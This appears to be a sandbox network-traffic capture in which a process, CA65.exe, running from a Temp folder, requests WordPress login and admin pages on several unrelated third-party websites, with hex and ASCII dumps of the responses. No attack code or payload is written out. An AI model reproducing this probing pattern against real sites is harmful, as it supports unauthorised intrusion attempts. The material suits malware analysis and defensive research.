2023-12-22 20:15:07 UTC	989	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:15:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Location: https://cannaclear.com CF-Cache-Status: DYNAMIC Access-Control-Allow-Origin: * Cache-Control: no-cache, must-revalidate, max-age=0 Expires: Wed, 11 Jan 1984 05:00:00 GMT Vary: X-Forwarded-Proto,Accept-Encoding x-redirect-by: Rank Math Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gaHuV0ipW%2BQvcCPHqE6H2F%2BMUwGzWJ6MmlzdyOIwVd7bTpY40Tr2ShLF4sQneKrIyl0LNSVSaoT8E%2BnFUOK7qNXdxjet%2FvFey39wfa%2BN2VxQ%2BwZ%2BZ41aK9s%2B%2FslniTwzSA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} expect-ct: max-age=86400, enforce referrer-policy: same-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block Server: cloudflare CF-RAY: 839b08f518c7da97-MIA alt-svc: h3=":443"; ma=86400
2023-12-22 20:15:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
236	192.168.2.4	50392	185.162.89.66	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:06 UTC	256	OUT	GET /wp-login.php?redirect_to=https%3A%2F%2Foceanictrailers.com.au%2Fwp-admin%2F&reauth=1 HTTP/1.1 Host: oceanictrailers.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:07 UTC	1304	IN	HTTP/1.1 200 OK Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 set-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure x-frame-options: SAMEORIGIN set-cookie: wordpress_cd0a580d5aeafc1127fa3827584aafc4=%20; expires=Thu, 22-Dec-2022 20:15:07 GMT; Max-Age=0; path=/wp-admin; secure set-cookie: wordpress_sec_cd0a580d5aeafc1127fa3827584aafc4=%20; expires=Thu, 22-Dec-2022 20:15:07 GMT; Max-Age=0; path=/wp-admin; secure set-cookie: wordpress_cd0a580d5aeafc1127fa3827584aafc4=%20; expires=Thu, 22-Dec-2022 20:15:07 GMT; Max-Age=0; path=/wp-content/plugins; secure set-cookie: wordpress_sec_cd0a580d5aeafc1127fa3827584aafc4=%20; expires=Thu, 22-Dec-2022 20:15:07 GMT; Max-Age=0; path=/wp-content/plugins; secure set-cookie: wordpress_logged_in_cd0a580d5aeafc1127fa3827584aafc4=%20; expires=Thu, 22-Dec-2022 20:15:07 GMT; Max-Age=0; path=/; secure set-cookie: wordpress_logged_in_cd0a580d5aeafc1127fa3827584aafc4=%20; expires=Thu, 22-Dec-2022 20:15:07 GMT; Max-Age=0; path=/; secure set-cookie: wp-settings-0=%20; expires=Thu, 22-Dec-2022 20:15:07 GMT; Max-Age=0; path=/; secure set-cookie: wp-settings-time-0=%20; expires=Thu, 22-Dec-2022 20:15:07 GMT; Max-Age=0; path=/; secure
2023-12-22 20:15:07 UTC	1399	IN	Data Raw: 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 63 64 30 61 35 38 30 64 35 61 65 61 66 63 31 31 32 37 66 61 33 38 32 37 35 38 34 61 61 66 63 34 3d 25 32 30 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 32 32 2d 44 65 63 2d 32 30 32 32 20 32 30 3a 31 35 3a 30 37 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 30 3b 20 70 61 74 68 3d 2f 3b 20 73 65 63 75 72 65 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 63 64 30 61 35 38 30 64 35 61 65 61 66 63 31 31 32 37 66 61 33 38 32 37 35 38 34 61 61 66 63 34 3d 25 32 30 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 32 32 2d 44 65 63 2d 32 30 32 32 20 32 30 3a 31 35 3a 30 37 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 30 3b 20 70 61 74 68 3d 2f 3b 20 73 65 63 75 72 65 0d 0a 73 65 74 Data Ascii: set-cookie: wordpress_cd0a580d5aeafc1127fa3827584aafc4=%20; expires=Thu, 22-Dec-2022 20:15:07 GMT; Max-Age=0; path=/; secureset-cookie: wordpress_cd0a580d5aeafc1127fa3827584aafc4=%20; expires=Thu, 22-Dec-2022 20:15:07 GMT; Max-Age=0; path=/; secureset
2023-12-22 20:15:07 UTC	5866	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 4f 63 65 61 6e 69 63 20 54 72 61 69 6c 65 72 73 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 61 72 63 68 69 76 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Oceanic Trailers — WordPress</title><meta name='robots' content='max-image-preview:large, noindex, noarchiv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
237	192.168.2.4	50919	104.24.82.4	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:06 UTC	176	OUT	GET /wp-admin HTTP/1.1 Host: www.thenile.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:07 UTC	658	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:15:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cache-Control: private, no-store x-request-id: 3c9eb11d-4b7b-4199-b341-d80991657642 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZWcXIBENXueb0kGdpn8RKTygoPg50J0p9Hk6ncbeUC77WjITem8%2F%2Bj7hOvWFlSRIk52Nb48kvKfqIwitGt2o9gb2bLUG2DFtUKBVxxqTHbaKUggSBv6FpxD2hwDu2q0QoOvvEA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b08f5ee5a8e00-MIA
2023-12-22 20:15:07 UTC	711	IN	Data Raw: 31 61 31 63 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 5f 5f 5f 5f 5f 20 5f 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5f 5f 20 5f 20 5f 0a 2f 5f 5f 20 20 20 5c 20 7c 5f 5f 20 20 20 5f 5f 5f 20 20 2f 5c 20 5c 20 28 5f 29 20 7c 20 5f 5f 5f 0a 20 20 2f 20 2f 5c 2f 20 27 5f 20 5c 20 2f 20 5f 20 5c 2f 20 20 5c 2f 20 2f 20 7c 20 7c 2f 20 5f 20 5c 20 f0 9f 8c 8f 0a 20 2f 20 2f 20 20 7c 20 7c 20 7c 20 7c 20 20 5f 5f 2f 20 2f 5c 20 20 2f 7c 20 7c 20 7c 20 20 5f 5f 2f 20 f0 9f 90 a8 0a 20 5c 2f 20 20 20 7c 5f 7c 20 7c 5f 7c 5c 5f 5f 5f 5c 5f 5c 20 5c 2f 20 7c 5f 7c 5f 7c 5c 5f 5f 5f 7c 20 f0 9f 91 be 0a 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 Data Ascii: 1a1c<!doctype html>... _____ _ __ _ _/__ \ \|__ ___ /\ \ (_) \| ___ / /\/ '_ \ / _ \/ \/ / \| \|/ _ \ / / \| \| \| \| __/ /\ /\| \| \| __/ \/ \|_\| \|_\|\___\_\ \/ \|_\|_\|\___\| --><html class="no-js" lang="en"><head>
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0a 0a 20 20 20 20 0a 20 20 20 20 0a 20 20 20 20 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 41 6c 67 6f 6c 69 61 43 6f 6e 66 69 67 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 64 65 78 3a 20 22 70 72 6f 64 75 63 74 73 5f 74 68 65 6e 69 6c 65 5f 61 75 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 6f 72 74 69 6e 67 3a 20 74 72 75 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 70 70 49 64 3a 20 22 33 4d 41 36 42 51 4d 39 56 4b 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 6b 65 79 3a 20 22 35 65 38 36 30 66 33 35 61 37 63 38 39 34 34 32 30 33 39 37 38 64 62 37 32 63 65 36 36 39 31 33 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 72 65 72 Data Ascii: dataLayer \|\| []; window.AlgoliaConfig = { index: "products_thenile_au", sorting: true, appId: "3MA6BQM9VK", key: "5e860f35a7c8944203978db72ce66913", prer
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 57 68 6f 6f 70 73 2e 2e 2e 20 74 68 61 74 20 70 61 67 65 20 64 6f 65 73 6e e2 80 99 74 20 65 78 69 73 74 2e 20 34 30 34 20 45 72 72 6f 72 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 2f 2f 69 6d 61 67 65 73 2e 74 68 65 6e 69 6c 65 2e 69 6f 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 Data Ascii: Whoops... that page doesnt exist. 404 Error. </title> <link rel="preconnect" href="//images.thenile.io"><link rel="preconnect" href="https://cdnjs.cloudflare.com"><link rel="dns-prefetch" href="//www.googletagmanager.com"><link rel="
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 6c 20 79 6f 75 72 20 6f 6e 6c 69 6e 65 20 73 68 6f 70 70 69 6e 67 20 6e 65 65 64 73 20 61 72 65 20 61 74 20 54 68 65 4e 69 6c 65 2e 63 6f 6d 2e 61 75 20 77 69 74 68 20 46 72 65 65 20 33 30 20 44 61 79 20 52 65 74 75 72 6e 73 21 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6a 73 2e 73 74 72 69 70 65 2e 63 6f 6d 2f 76 33 2f 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 6e 67 2d 61 70 70 3d 22 74 6e 41 70 70 22 20 6e 67 2d 63 6f 6e 74 72 6f 6c 6c 65 72 3d Data Ascii: <meta property="og:description" content="All your online shopping needs are at TheNile.com.au with Free 30 Day Returns!"> <script src="https://js.stripe.com/v3/"></script> </head><body ng-app="tnApp" ng-controller=
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 30 56 37 32 76 31 38 7a 22 20 73 74 72 6f 6b 65 3d 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 36 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 72 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 38 30 20 31 37 35 56 37 35 6c 38 30 20 36 35 6d 30 2d 36 35 76 31 30 30 6d 39 30 2d 31 30 30 76 31 30 30 6d 38 30 2d 31 30 30 76 31 30 30 68 36 35 6d 31 33 35 20 30 68 2d 36 30 56 37 35 68 36 30 6d 2d 36 30 20 35 30 68 35 30 22 20 73 74 72 6f 6b 65 3d 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 31 30 22 20 73 74 72 6f 6b Data Ascii: 0V72v18z" stroke="currentColor" stroke-width="6" stroke-linecap="round" stroke-linejoin="round"/> <path d="M180 175V75l80 65m0-65v100m90-100v100m80-100v100h65m135 0h-60V75h60m-60 50h50" stroke="currentColor" stroke-width="10" strok
2023-12-22 20:15:07 UTC	505	IN	Data Raw: 39 2e 35 20 31 33 2e 31 31 36 2d 32 31 20 31 36 2e 36 34 37 20 30 20 30 20 31 32 20 34 2e 37 38 33 20 34 34 20 35 2e 34 37 39 76 2e 30 32 39 63 32 35 2e 35 2d 2e 32 32 35 20 34 34 2d 34 2e 37 32 35 20 34 34 2d 34 2e 37 32 35 2d 31 37 2e 35 2d 36 2d 32 31 2d 31 37 2e 34 33 2d 32 31 2d 31 37 2e 34 33 20 37 2e 35 2e 39 33 20 31 34 2e 35 2d 33 2e 35 37 20 31 34 2e 35 2d 33 2e 35 37 2d 31 32 2d 35 2e 35 2d 32 30 2e 35 2d 31 37 2e 31 31 33 2d 32 30 2e 35 2d 31 37 2e 31 31 33 20 33 20 30 20 39 2d 34 2e 30 33 35 20 39 2d 34 2e 30 33 35 2d 38 2d 31 2e 35 31 34 2d 31 36 2d 31 33 2e 31 31 36 2d 31 36 2d 31 33 2e 31 31 36 43 33 36 35 20 39 34 2e 35 20 33 37 31 2e 35 20 39 32 20 33 37 31 2e 35 20 39 32 63 2d 38 2d 33 2e 32 31 38 32 2d 31 35 2d 31 30 2e 38 37 35 33 2d Data Ascii: 9.5 13.116-21 16.647 0 0 12 4.783 44 5.479v.029c25.5-.225 44-4.725 44-4.725-17.5-6-21-17.43-21-17.43 7.5.93 14.5-3.57 14.5-3.57-12-5.5-20.5-17.113-20.5-17.113 3 0 9-4.035 9-4.035-8-1.514-16-13.116-16-13.116C365 94.5 371.5 92 371.5 92c-8-3.2182-15-10.8753-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
238	192.168.2.4	50897	3.33.130.190	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:06 UTC	321	OUT	GET /admin HTTP/1.1 Host: loghole.com Accept: / Accept-Encoding: deflate, gzip Cookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:07 UTC	836	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 22 Dec 2023 20:15:07 GMT Content-Type: text/html Content-Length: 1543 Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT Connection: close ETag: "657a13bf-607" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_jwgMtSsz4k+BONzzjlFfzfhZp0xM9rYHYovY4f8481afqFDB0hFgGRPRXsnq1FRpSNiQQPFjZKODNAA0do1KFQ Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2023-12-22 20:15:07 UTC	1543	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
239	192.168.2.4	50944	104.26.6.37	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:06 UTC	199	OUT	GET /domain_profile.cfm?d=vixej.com HTTP/1.1 Host: www.hugedomains.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:07 UTC	883	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:15:07 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close cache-control: private vary: Accept-Encoding set-cookie: site_version_phase=108; expires=Mon, 16-Dec-2024 20:15:07 GMT; path=/ set-cookie: site_version=HDv3; expires=Mon, 16-Dec-2024 20:15:07 GMT; path=/ set-cookie: captcha-tracker=; expires=Thu, 21-Dec-2023 20:15:07 GMT; path=/ x-powered-by: ASP.NET lb: TclPrdLbHd3 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ppj%2FGjmMmNFkErulmN9%2FnWCKnxHs76jCtHecyk%2BBQdi%2Fca%2BYalmU%2BM2EYaR4Po8PtkExCdbENKzgW%2FpSm4updkpTAZjOzVefvQU3Xj0CHVqafz%2BaZxDDyJgCQ89jaCSdxiMfAFM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b08f60c0a67d5-MIA
2023-12-22 20:15:07 UTC	486	IN	Data Raw: 31 61 64 37 0d 0a 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 67 68 2f 66 61 6e 63 79 61 70 70 73 2f 66 61 6e 63 79 62 6f 78 40 33 2e 35 2e 37 2f 64 69 73 74 2f 6a 71 75 65 72 79 2e 66 Data Ascii: 1ad7<!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.f
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 68 75 67 65 64 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 3f 72 3d 32 30 32 30 31 31 30 35 61 22 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 61 70 69 2e 6a 73 22 20 61 73 79 6e 63 20 64 65 66 65 72 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 37 31 31 37 33 33 39 2d 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 Data Ascii: ref="https://static.hugedomains.com/css/hdv3-css/responsive.css?r=20201105a"><script src="https://www.google.com/recaptcha/api.js" async defer></script><script async src="https://www.googletagmanager.com/gtag/js?id=UA-7117339-4"></script><script>
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 3c 6d 61 69 6e 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6d 61 69 6e 20 66 6c 61 74 2d 68 65 61 64 65 72 22 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 62 6f 75 74 2d 70 61 67 65 20 67 75 69 64 65 2d 68 6f 6d 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 64 65 66 61 75 6c 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 2d 66 6c 65 78 20 61 69 2d 73 74 61 72 74 20 63 68 65 63 6b 6f 75 74 2d 62 6f 64 79 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 68 65 63 6b 6f 75 74 2d 63 6f 6e 74 65 6e 74 20 66 75 6c 6c 2d 77 69 64 74 68 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 62 6f 75 74 Data Ascii: ></div></div></div></header><main class="site-main flat-header"><section class="about-page guide-home"><div class="container default"><div class="d-flex ai-start checkout-body"><div class="checkout-content full-width-container"><div class="about
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 3d 22 63 69 72 63 75 6c 61 72 47 5f 34 22 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 47 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 63 69 72 63 75 6c 61 72 47 5f 35 22 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 47 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 63 69 72 63 75 6c 61 72 47 5f 36 22 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 47 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 63 69 72 63 75 6c 61 72 47 5f 37 22 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 47 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 63 69 72 63 75 6c 61 72 47 5f 38 22 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 47 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 2f Data Ascii: ="circularG_4" class="circularG"></div><div id="circularG_5" class="circularG"></div><div id="circularG_6" class="circularG"></div><div id="circularG_7" class="circularG"></div><div id="circularG_8" class="circularG"></div></div></button></form></
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 66 6f 72 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 61 70 74 63 68 61 2d 66 6f 72 6d 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 61 70 74 63 68 61 2d 73 75 62 6d 69 74 2d 62 75 74 74 6f 6e 22 29 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 73 75 62 6d 69 74 42 75 74 74 6f 6e 20 3d 20 74 68 69 73 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 73 75 62 6d 69 74 53 70 69 6e 6e 65 72 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 Data Ascii: var form = document.getElementById("captcha-form"); document.getElementById("captcha-submit-button").addEventListener("click", function () { var submitButton = this; var submitSpinner = document.ge
2023-12-22 20:15:07 UTC	917	IN	Data Raw: 74 66 6f 72 6d 2f 73 63 72 69 70 74 73 2f 6a 73 64 2f 6d 61 69 6e 2e 6a 73 27 2c 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 5f 63 70 6f 29 3b 22 3b 76 61 72 20 5f 30 78 68 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 69 66 72 61 6d 65 27 29 3b 5f 30 78 68 2e 68 65 69 67 68 74 20 3d 20 31 3b 5f 30 78 68 2e 77 69 64 74 68 20 3d 20 31 3b 5f 30 78 68 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 20 3d 20 27 61 62 73 6f 6c 75 74 65 27 3b 5f 30 78 68 2e 73 74 79 6c 65 2e 74 6f 70 20 3d 20 30 3b 5f 30 78 68 2e 73 74 79 6c 65 2e 6c 65 66 74 20 3d 20 30 3b 5f 30 78 68 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 20 3d 20 Data Ascii: 